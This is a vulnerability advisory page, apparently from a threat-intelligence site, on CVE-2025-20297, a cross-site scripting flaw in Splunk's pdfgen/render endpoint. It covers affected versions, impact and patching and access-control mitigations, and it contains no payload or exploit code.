Skip to main content

CVE-2025-20297: The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. in Splunk Splunk Enterprise

Medium
VulnerabilityCVE-2025-20297cvecve-2025-20297
Published: Mon Jun 02 2025 (06/02/2025, 17:14:02 UTC)
Source: CVE Database V5
Vendor/Project: Splunk
Product: Splunk Enterprise

Description

In Splunk Enterprise versions below 9.4.2, 9.3.4 and 9.2.6, and Splunk Cloud Platform versions below 9.3.2411.102, 9.3.2408.111 and 9.2.2406.118, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious payload through the pdfgen/render REST endpoint that could result in execution of unauthorized JavaScript code in the browser of a user.

AI-Powered Analysis

AILast updated: 07/11/2025, 07:50:11 UTC

Technical Analysis

CVE-2025-20297 is a medium-severity vulnerability affecting Splunk Enterprise versions prior to 9.4.2, 9.3.4, and 9.2.6, as well as corresponding versions of Splunk Cloud Platform. The vulnerability arises from improper neutralization of user-controllable input before it is incorporated into web page output served to other users. Specifically, a low-privileged user lacking the "admin" or "power" roles can exploit the pdfgen/render REST endpoint to inject malicious payloads. This can lead to unauthorized execution of JavaScript code in the browsers of other users viewing the affected web pages. The vulnerability is a form of cross-site scripting (XSS), where the attacker leverages insufficient input sanitization to execute scripts in the context of another user's session. The CVSS 3.1 score is 4.3, reflecting a network attack vector with low complexity, requiring low privileges but no user interaction, and resulting in limited confidentiality impact without affecting integrity or availability. No known exploits are currently reported in the wild. The vulnerability affects multiple recent major versions of Splunk Enterprise, a widely used platform for operational intelligence, log management, and security information and event management (SIEM). The pdfgen/render endpoint is likely used for generating PDF reports or rendering content, making it a critical component for user-facing output. Exploitation could allow attackers to steal session tokens, perform actions on behalf of other users, or conduct phishing attacks within the trusted Splunk environment.

Potential Impact

For European organizations, this vulnerability poses a risk primarily to confidentiality due to potential unauthorized JavaScript execution in user browsers. Organizations using Splunk Enterprise or Splunk Cloud Platform for log management and security analytics could see targeted attacks aiming to compromise user sessions or exfiltrate sensitive information. Since the vulnerability requires only low privileges and no user interaction, insider threats or compromised low-privileged accounts could be leveraged to escalate attacks. The impact is heightened in sectors with stringent data protection regulations such as GDPR, where unauthorized data exposure can lead to regulatory penalties and reputational damage. Additionally, organizations relying heavily on Splunk dashboards and reports for security monitoring may face risks of manipulated or misleading information if attackers inject malicious scripts. However, the vulnerability does not affect system integrity or availability directly, limiting its impact to confidentiality breaches and potential session hijacking or phishing within the Splunk user base.

Mitigation Recommendations

European organizations should prioritize upgrading affected Splunk Enterprise and Cloud Platform instances to versions 9.4.2, 9.3.4, or 9.2.6 or later, where the vulnerability is patched. Until patches are applied, organizations should restrict access to the pdfgen/render REST endpoint to trusted users only, ideally limiting it to admin or power roles. Implementing strict role-based access controls (RBAC) and monitoring for unusual activity on this endpoint can reduce exploitation risk. Web application firewalls (WAFs) with custom rules to detect and block suspicious payloads targeting the pdfgen/render endpoint may provide temporary protection. Additionally, organizations should educate users about the risks of XSS and encourage cautious behavior when interacting with Splunk-generated content. Regular security audits and penetration testing focusing on Splunk deployments can help identify residual risks. Finally, logging and alerting on REST endpoint usage can facilitate early detection of exploitation attempts.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
cisco
Date Reserved
2024-10-10T19:15:13.252Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 683ddf3a182aa0cae24e7e32

Added to database: 6/2/2025, 5:28:26 PM

Last enriched: 7/11/2025, 7:50:11 AM

Last updated: 8/11/2025, 5:34:36 PM

Views: 17

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats